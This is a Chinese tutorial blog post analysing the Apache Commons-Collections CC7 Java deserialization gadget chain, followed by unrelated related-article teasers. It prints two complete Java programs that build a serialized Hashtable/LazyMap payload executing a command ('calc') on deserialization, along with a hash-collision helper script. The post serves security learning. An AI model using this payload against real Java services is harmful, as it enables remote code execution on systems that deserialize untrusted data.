Java安全--CC7

news2025/1/19 17:16:16

在学CC7的时候我有这么几个疑问

1.为什么要两个LazyMap

2.hashCode那一步怎么计算的

3.为什么要remove yy

4.为什么put两个

我们可以先看一下CC7的链子是怎么走的:

其实分析链子还是从命令执行走到readObject比较好理解,虽然比较麻烦,比较繁琐,但还是这样子分析提升比较大,主要是知道自己在写啥,知道某个地方我们需要传入什么,不用抄一份payload去调试。

我们从LazyMap这个点开始,因为LazyMap前面我们都很熟悉了,现在我们的目的是找何处调用了get,右键get,查找方法,有一千多个,最后定位在了AbstractMap这里,AbstractMap.equals调用了get,所以只要何处调用了equals,就可以继续下一步

这里有个很关键的点,就是AbstractMap是被HashMap继承的

而且equals这个方法AbstractMap有并且调用了get,但是HashMap没有equals这个方法。即只要调用了HashMap.equals就会调用AbstractMap.equals,然后会调用LazyMap.get,一切就大功告成了

继续往上,在HashTable中的reconstitutionPut方法调用了key.equals,所以只要控制key的类型为HashMap就可以了

而reconstitutionPut也在HashTable的readObject中调用了

到此我们就可以开始编写EXP了,因为如果不从Hashtable这个类来写的话利用AbstractMap这个抽象类不put东西的时候是进不到LazyMap.get的,但是如果put东西了就会过不了LazyMap.get里面判断键存不存在。然后自相矛盾,所以只能从Hashtable开始编写了:

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.AbstractMapDecorator;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.AbstractMap;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

public class CC7 {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map lazymap1 = LazyMap.decorate(hashMap, new ConstantTransformer(1));
        lazymap1.put("Aa", "value");

        HashMap<Object, Object> hashMap1 = new HashMap<>();
        Map lazymap2 = LazyMap.decorate(hashMap1, chainedTransformer);
        lazymap2.put("BB", "value");

        Hashtable<Object, Object> objectObjectHashtable = new Hashtable<>();
        objectObjectHashtable.put(lazymap1, 1);
        objectObjectHashtable.put(lazymap2, 2);

        serialize(objectObjectHashtable);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

解疑一:为什么remove(Aa)

我们用这个代码的时候发现序列化的时候可以弹计算器,但是反序列化却不行。其实还是老毛病,就是在执行objectObjectHashtable.put(lazymap2, 2);的时候会put进去一个元素:

(下图是序列化的时候put进去一个键)

所以反序列的时候进不了那个判断键是否存在的判断:

(下图是反序列化的时候过不了的那个判断)

因此要remove(Aa)这样子才能过那个判断。

解疑二:Hashtable为什么要put两个

我们需要执行Hashtable的e.key.equals,而要执行这个语句需要有两个Entry才能进行遍历,并且会执行第二个Entry的e.key.equals,所以我们需要在第二个Entry中传入恶意链(当然方便起见也可以两个都传)。因此需要两个LazyMap,从而put两个。

(下图是反序列化的时候需要进入并执行的for循环)

解疑三:对于LazyMap.put里面的字母有要求吗?

答案是有,还是上面那张图,就是进入了for循环,还得过前半个判断。因为 0&&xxx,xxx是不会被执行的,所以我们要确保e.hash==hash,即我们第一个传入的LazyMap的ke的.hash值和第二个传入LazyMapkey的的hash值要相等。

怎么确保他们相等呢?可以先调试进去看一下:

可以看到他的计算规律就是

第一次计算val[i]是A,A的ascii码值为65,h值就是65。

第二次计算var[i]是a, a的ascii码是97,所以第二次计算就是31*65 + 97 = 2112

从此我们可以写一个脚本:

import string

code = string.ascii_uppercase + string.ascii_lowercase


def hashCode(hashString):
    return 31 * ord(hashString[0]) + ord(hashString[1])


for i in code:
    for j in code:
        for m in code:
            for n in code:
                str1 = i + j
                str2 = m + n
                if str1 != str2 and hashCode(str1) == hashCode(str2):
                    print("值为:" + str(hashCode(str1)) + " " + "code1:" + str(str1) + " " + "code2:" + str(str2))

只要是跑出来的组合都可以使用。

由于上面那个代码序列化的时候也会弹计算器,这是我们不希望的,因此我们利用反射改进一下代码:

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.AbstractMapDecorator;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.AbstractMap;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

public class CC7 {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[0]);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map<Object, Object> lazymap1 = LazyMap.decorate(hashMap, new ConstantTransformer(1));
        lazymap1.put("Aa", "value");

        HashMap<Object, Object> hashMap1 = new HashMap<>();
        Map lazymap2 = LazyMap.decorate(hashMap1, chainedTransformer);
        lazymap2.put("BB", "value");

        Hashtable<Object, Object> objectObjectHashtable = new Hashtable<>();
        objectObjectHashtable.put(lazymap1, 1);
        objectObjectHashtable.put(lazymap2, 2);

        lazymap2.remove("Aa");

        Class<ChainedTransformer> chainedTransformerClass = ChainedTransformer.class;
        Field iTransformers = chainedTransformerClass.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(chainedTransformer, transformers);

//        serialize(objectObjectHashtable);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/106186.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

机器人机械臂运动学——逆运动学解算

1.情景概述 假设最一般的情况&#xff0c;我们的机械臂有六个自由度&#xff0c;那么从初始状态想要变化到目标的状态&#xff0c;一般情况下我们至少需要进行六次的变换&#xff0c;而这六次变换的矩阵参数隐含在整体的变换矩阵中。 根据之前的知识&#xff0c;左上角的3*3代表…

m基于隐马尔科夫模型(HMM)的手机用户行为预测(MMUB)算法matlab仿真

目录 1.算法描述 2.仿真效果预览 3.MATLAB核心程序 4.完整MATLAB 1.算法描述 隐马尔可夫模型&#xff08;Hidden Markov Model&#xff0c;HMM&#xff09;是一种统计模型&#xff0c;广泛应用在语音识别&#xff0c;词性自动标注&#xff0c;音字转换&#xff0c;概率文法…

R语言中的Nelson-Siegel模型在汇率预测的应用

这篇文章的目的是指导读者逐步使用R编程语言实现Nelson-Siegel模型的步骤。 最近我们被客户要求撰写关于Nelson-Siegel模型的研究报告&#xff0c;包括一些图形和统计输出。 您可能已经知道&#xff0c;估计利率期限结构是任何资产定价的关键&#xff0c;因此对投资者和政策制…

5G无线技术基础自学系列 | 基于Massive MIMO的场景化波束优化

素材来源&#xff1a;《5G无线网络规划与优化》 一边学习一边整理内容&#xff0c;并与大家分享&#xff0c;侵权即删&#xff0c;谢谢支持&#xff01; 附上汇总贴&#xff1a;5G无线技术基础自学系列 | 汇总_COCOgsta的博客-CSDN博客 前面内容提到&#xff0c; 5G中引入了M…

机器人机械臂运动学——运动学正向解算

本博客内容参考台湾大学_林沛群教授_机器人学的课程内容 1.相对运动关系的描述方法 假设有现在这样的一个情景&#xff0c;从左到右有三个转轴&#xff0c;转轴本身可以转动&#xff0c;也可以沿着轴线上下平动&#xff0c;那么我们如何描述其中的运动学关系及其位置关系呢&am…

Linux Red Hat 8.0 cat、cut、sed、tail命令

1.cat&#xff1a; 在终端设备上显示文件内容 常用选项&#xff1a; -n 显示行数&#xff08;空格有编号&#xff09; -b 显示行数&#xff08;空格没有编号&#xff09; 命令格式&#xff1a;cat 选项 文件 特殊用法tac&#xff1a;倒着显示内容 配合重定向使用 查看 test1…

DPDK 多进程

DPDK库里是支持多进程和多线程&#xff0c;本文主要总结多进程的相关的操作。 DPDK多进程使用的关键启动参数&#xff1a; --proc-type&#xff1a;指定一个dpdk进程是主进程还是副进程&#xff08;参数值就用上面的primary或是secondary&#xff0c;或者是auto&#xff09;-…

【Bio】基础生物学 - 五个重要官能团 five important functional group

文章目录1. 羟qiǎng基&#xff08;hydroxyl&#xff09;2. 羧suō基&#xff08;carboxyl&#xff09;3. 氨基&#xff08;amino&#xff09;4. 磷酸盐&#xff08;phosphate&#xff09;5. 巯基&#xff08;sulfhydryl&#xff09;1. 羟qiǎng基&#xff08;hydroxyl&#xf…

最新进展 | Android 自定义机器学习堆栈

作者 / Android 机器学习平台团队相较于服务器端机器学习 (ML)&#xff0c;设备端机器学习有其独特的优势&#xff0c;如支持离线使用、延迟更低、隐私性更高和推理成本更低&#xff0c;因此 Android 中设备端机器学习的使用迅速增长。在构建基于设备端 ML 的功能时&#xff0c…

Android基于perfetto分析native内存泄露

官方文档(可在Chome直接翻译) https://perfetto.dev/docs/data-sources/native-heap-profiler 示例 raw-trace 资源地址 https://download.csdn.net/download/CSqingchen/87321798 本文示例是windows&#xff0c;这里使用了python工具&#xff0c;在Linux和mac同样适用 首先安装…

胡凡 《算法笔记》 上机实战训练指南 3.1 简单模拟

胡凡 《算法笔记》 上机实战训练指南 3.1 持续更新中 , 菜鸡的刷题笔记… 大学到现在了还没咋好好刷过题&#xff0c;该push自己了… 文章目录胡凡 《算法笔记》 上机实战训练指南 3.13.1 简单模拟【PAT B1001】害死人不偿命的&#xff08;3n1&#xff09;猜想【PAT B1032】挖掘…

spring扩展之基于HandlerMapping实现接口灰度发布的demo

背景 面试经常被问到&#xff0c;你了解spring源码吗&#xff1f;有基于spring做过什么扩展吗&#xff1f;除了PropertyPlaceholderConfigurer处理占位符(被说烂了)还有其他的吗&#xff1f; 看了springmvc的源码&#xff0c;有了一个新的案例可讲(吹) 基于HandlerMapping实现…

运营活动没做好,是没有明确目标

有很多运营人在做项目的时候&#xff0c;其实没有一个明确的目标&#xff0c;不清楚自己究竟为什么要做这件事。 我们在做运营方案前&#xff0c;要分析用户的需求有哪些&#xff0c;如何达成目标&#xff0c;制定出一个计划&#xff1a; 1、要做什么——计划 我们需要掌握运…

ES基础入门

ES 一、简介 1、Elastic Stack ES技术栈&#xff1a; ElasticSearch&#xff1a;存数据搜索&#xff1b;QL&#xff1b;Kibana&#xff1a;Web可视化平台&#xff0c;分析。LogStash&#xff1a;日志收集&#xff0c;Log4j:产生日志&#xff1b;log.info(xxx)。。。。 使用…

软件测试面试题和面试流程

自我介绍部分 .... 项目经历 .... 技能部分 性能 使用什么工具&#xff1f;介绍下最近做的性能测试项目&#xff0c;性能测试过程中遇到哪些问题&#xff1f;性能标准谁来定&#xff1f;你们性能测试的流程是什么&#xff1f;什么是分布式&#xff1f;为什么要用分布式&a…

硅片检测半导体运动台控制器的设计(二)

虽然我国目前对于精密硅片检测运动平台的整机研发还比较空白&#xff0c;但是值得注意的是&#xff0c;对于 X、Y 两自由度运动平台&#xff0c;甚至多自由度运动平台、先进驱动方式和控制策略的研究已经积累了一定的经验&#xff0c;吸收这些经验并应用于本运动平台的研发对选…

分布式系统(事务处理)

文章目录事务&#xff08;Transaction&#xff09;分布式事务原子提交协议单阶段提交两阶段提交三阶段提交串行等价 / 并发控制分布式死锁锁超时全局等待图边追逐算法事务放弃时的恢复服务器崩溃后的恢复恢复文件重组恢复文件日志从Crash 中恢复2PC 的恢复事务&#xff08;Tran…

【Bio】基础生物学 - 化学键 chemical bond

文章目录化学键1. 共价键2. 离子键3. 金属键4. 非共价键5. 氢键Ref.化学键 化学键&#xff08;chemical bond&#xff09;是纯净物分子内或晶体内相邻两个或多个原子&#xff08;或离子&#xff09;间强烈的相互作用力的统称。使离子&#xff08;ion&#xff09;相结合或原子&…

【强化学习笔记】二.价值学习

文章目录Q&A1.DQN工作原理2.如何训练DQN2.1.如何更新模型参数3.2.1.完整走完流程&#xff0c;再更新模型参数。3.2.2.无需走完流程&#xff0c;即可更新模型参数。3.如何将TD算法应用到DQN网络Q&A 问&#xff1a;强化学习的目标是什么&#xff1f; 最大化累计奖励&am…

Windows 的 常用指令操作

目录 1、启动方式 2、修改cmd窗口背景色和字体色 3、文件夹常用指令 4、网络相关常用指令 5、其他常用命令 1、启动方式 用户启动&#xff1a;winR&#xff0c;输入cmd&#xff0c;Enter。 管理员启动&#xff1a;winR&#xff0c;输入cmd&#xff0c;CTRLShiftEnter。 …